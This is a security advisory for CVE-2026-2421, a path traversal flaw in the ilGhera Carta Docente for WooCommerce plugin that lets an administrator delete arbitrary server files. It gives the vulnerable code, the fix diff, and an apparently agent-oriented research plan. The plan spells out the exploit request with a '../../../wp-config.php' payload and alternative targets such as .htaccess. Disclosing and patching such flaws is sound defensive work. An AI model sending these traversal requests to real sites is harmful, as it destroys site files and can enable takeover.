ilGhera Carta Docente for WooCommerce <= 1.5.0 - Authenticated (Administrator+) Path Traversal to Arbitrary File Deletion via 'cert' Parameter
Description
The ilGhera Carta Docente for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.5.0 via the 'cert' parameter of the 'wccd-delete-certificate' AJAX action. This is due to insufficient file path validation before performing a file deletion. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, such as wp-config.php, which can make site takeover and remote code execution possible.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:HTechnical Details
<=1.5.0What Changed in the Fix
Changes introduced in v1.5.1
Source Code
WordPress.org SVN# Vulnerability Research Plan: CVE-2026-2421 - Arbitrary File Deletion in ilGhera Carta Docente for WooCommerce ## 1. Vulnerability Summary The **ilGhera Carta Docente for WooCommerce** plugin (versions <= 1.5.0) contains a path traversal vulnerability in its certificate deletion functionality. Spe…
Show full research plan
Vulnerability Research Plan: CVE-2026-2421 - Arbitrary File Deletion in ilGhera Carta Docente for WooCommerce
1. Vulnerability Summary
The ilGhera Carta Docente for WooCommerce plugin (versions <= 1.5.0) contains a path traversal vulnerability in its certificate deletion functionality. Specifically, the delete_certificate_callback function in includes/class-wccd-admin.php takes a filename from the cert POST parameter and concatenates it with a base directory constant (WCCD_PRIVATE) before passing it directly to unlink().
While the input is passed through sanitize_text_field(), this WordPress function does not remove directory traversal sequences (e.g., ../). An authenticated Administrator can exploit this to delete any file the PHP process has permission to remove, including the critical wp-config.php file.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
wccd-delete-certificate - Vulnerable Parameter:
cert(POST) - Required Parameters:
action:wccd-delete-certificatewccd-delete: (Any value, must be set)delete-nonce: (Valid CSRF nonce for actionwccd-del-cert-nonce)cert: Path traversal payload (e.g.,../../../wp-config.php)
- Authentication Level: Administrator (
manage_optionscapability is required to access the settings page where the nonce is generated, and the AJAX action is registered within theWCCD_Adminclass). - Preconditions: The plugin must be active. WooCommerce must be active.
3. Code Flow
- Entry Point: In
includes/class-wccd-admin.php, the__construct()method registers the AJAX action:add_action( 'wp_ajax_wccd-delete-certificate', array( $this, 'delete_certificate_callback' ), 1 ); - Logic Trigger: The function
delete_certificate_callback()is invoked. - Nonce Check: The code verifies a nonce named
wccd-del-cert-noncepassed viadelete-nonce:if ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) { - Input Acquisition: The
certparameter is retrieved:$cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : ''; - Vulnerable Sink: If
$certis not empty, it is concatenated withWCCD_PRIVATEand deleted:unlink( WCCD_PRIVATE . $cert ); - Path Resolution:
WCCD_PRIVATEis defined inwc-carta-docente.phprelative to the WordPress uploads directory:wp-content/uploads/wccd-private/. Traversal starts here.
4. Nonce Acquisition Strategy
The nonce is localized specifically for the plugin's settings page in the WordPress admin dashboard.
- Navigate to the Settings Page: The plugin registers its settings page at
admin.php?page=wccd-settings(as a submenu ofwoocommerce). - Extracting the Nonce: The nonce is passed to the frontend using
wp_localize_script()inwc-carta-docente.php:wp_localize_script( 'wccd-admin-scripts', 'wccdData', array( 'delCertNonce' => $delete_nonce, 'addCatNonce' => $add_cat_nonce, ) ); - Browser Execution:
- Use
browser_navigateto go to/wp-admin/admin.php?page=wccd-settings. - Use
browser_evalto extract the nonce:window.wccdData?.delCertNonce.
- Use
5. Exploitation Strategy
The goal is to delete wp-config.php to force WordPress into a setup state, or simply to demonstrate arbitrary file deletion.
- Setup User: Create an Administrator user (if not already logged in).
- Get Nonce: Follow the strategy in Section 4 to obtain a valid
delCertNonce. - Determine Traversal Depth:
WCCD_PRIVATEiswp-content/uploads/wccd-private/.- To reach root (where
wp-config.phpresides), the traversal is:../../../wp-config.php. wccd-private/->..->uploads/->..->wp-content/->..-> root.
- Send Exploitation Request:
- Tool:
http_request - Method: POST
- URL:
[TARGET_URL]/wp-admin/admin-ajax.php - Body (URL-encoded):
action=wccd-delete-certificate&wccd-delete=1&delete-nonce=[NONCE]&cert=../../../wp-config.php - Headers:
Content-Type: application/x-www-form-urlencoded
- Tool:
6. Test Data Setup
- Plugin Activation: Ensure
wc-carta-docenteandwoocommerceare installed and activated. - Target File: Ensure
wp-config.phpexists (standard for WP) or create a canary file for safer testing:wp eval "file_put_contents(ABSPATH . 'canary.txt', 'pwned');"
- Traversal to Canary: If using
canary.txt, thecertparameter should be../../../canary.txt.
7. Expected Results
- The AJAX request will likely return a
200 OKor0(as it callsexit;immediately after processing). - The target file (e.g.,
wp-config.phporcanary.txt) will be removed from the server filesystem. - If
wp-config.phpis deleted, navigating to the homepage will redirect towp-admin/setup-config.php.
8. Verification Steps
- Check Filesystem: Use WP-CLI to check if the file still exists.
wp eval "echo file_exists(ABSPATH . 'canary.txt') ? 'exists' : 'deleted';"- Or check
wp-config.php:ls /var/www/html/wp-config.php(if in a shell).
- Check Site State: Attempt to access the site; a missing
wp-config.phptriggers the WordPress installation screen.
9. Alternative Approaches
- Deletion of .htaccess: If
wp-config.phpis protected by filesystem permissions, try deleting.htaccess(../../../.htaccess) to break site routing. - Plugin Deletion: Delete the main plugin file to disable security checks:
../../wc-carta-docente.php. - WCCD_PRIVATE Discovery: If the standard traversal depth fails, it may be because the uploads folder is moved. Verify the constant value:
wp eval "echo WCCD_PRIVATE;"to confirm the starting directory.
Summary
The ilGhera Carta Docente for WooCommerce plugin is vulnerable to arbitrary file deletion due to a path traversal flaw in its certificate management logic. An authenticated Administrator can use directory traversal sequences like '../../' in the 'cert' parameter to delete critical server files such as wp-config.php, potentially leading to site takeover.
Vulnerable Code
// includes/class-wccd-admin.php @ 1.5.0 /** * Cancella il certificato * * @return void */ public function delete_certificate_callback() { if ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) { $cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : ''; if ( $cert ) { unlink( WCCD_PRIVATE . $cert ); } } exit; }
Security Fix
@@ -81,11 +81,15 @@ if ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) { - $cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : ''; + $cert = isset( $_POST['cert'] ) ? sanitize_file_name( wp_unslash( $_POST['cert'] ) ) : ''; if ( $cert ) { - unlink( WCCD_PRIVATE . $cert ); + $file_path = realpath( WCCD_PRIVATE . $cert ); + + if ( $file_path && 0 === strpos( $file_path, realpath( WCCD_PRIVATE ) ) ) { + unlink( $file_path ); + } } } @@ -1,7 +1,7 @@ === ilGhera Carta Docente for WooCommerce === Contributors: ghera74 Tags: WooCommerce, payment gateway, Carta Docente, Carte Cultura, 18app -Stable tag: 1.5.0 +Stable tag: 1.5.1 Requires at least: 4.0 Tested up to: 6.9 License: GPLv3 @@ -76,6 +76,11 @@ == Changelog == += 1.5.1 = +Data di rilascio: 13 Marzo, 2026 + + * Sicurezza: Corretto path traversal nella cancellazione certificato (CVE-2026-2421) + = 1.5.0 = Data di rilascio: 4 Febbraio, 2026 @@ -6,8 +6,8 @@ * Author: ilGhera * * @package wc-carta-docente - * Version: 1.5.0 - * Stable tag: 1.5.0 + * Version: 1.5.1 + * Stable tag: 1.5.1 * Author URI: https://ilghera.com * Requires at least: 4.0 * Tested up to: 6.9 @@ -33,7 +33,7 @@ define( 'WCCD_URI', plugin_dir_url( __FILE__ ) ); define( 'WCCD_INCLUDES', WCCD_DIR . 'includes/' ); define( 'WCCD_INCLUDES_URI', WCCD_URI . 'includes/' ); - define( 'WCCD_VERSION', '1.5.0' ); + define( 'WCCD_VERSION', '1.5.1' ); /*Main directory di upload*/ $wp_upload_dir = wp_upload_dir();
Exploit Outline
The exploit targets the 'wccd-delete-certificate' AJAX action. An authenticated Administrator first retrieves a valid CSRF nonce ('wccd-del-cert-nonce') from the plugin's settings page by accessing the localized 'wccdData' object in the browser. Using this nonce, the attacker sends a POST request to '/wp-admin/admin-ajax.php' with the 'action' set to 'wccd-delete-certificate' and the 'cert' parameter containing a directory traversal payload (e.g., '../../../wp-config.php'). Because the plugin fails to validate that the resulting path is contained within the intended directory before calling unlink(), the targeted file is deleted from the filesystem.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.